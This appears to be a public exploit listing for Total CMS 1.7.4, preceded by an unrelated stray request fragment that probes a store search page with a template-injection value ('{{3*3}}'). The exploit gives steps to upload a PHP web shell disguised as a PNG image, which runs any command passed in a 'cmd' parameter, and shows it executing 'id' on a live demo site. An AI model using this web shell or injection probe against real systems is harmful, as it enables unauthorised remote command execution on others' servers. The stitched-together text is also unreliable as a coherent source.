https://template189526.motopreview.com/store/category/search/?keyword=%7B%7B3*3%7D%7D Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close

# Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE) # Date: 02/06/2023 # Exploit Author: tmrswrr # Version: 1.7.4 # Vendor home page : https://www.totalcms.co/ 1) Go to this page and click edit page button https://www.totalcms.co/demo/soccer/ 2)After go down and will you see downloads area 3)Add in this area shell.php file ?PNG ... <?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?> IEND 4) After open this file and write commands https://www.totalcms.co/cms-data/depot/cmssoccerdepot/shell.php?cmd=id Result : ?PNG ... uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data) IEND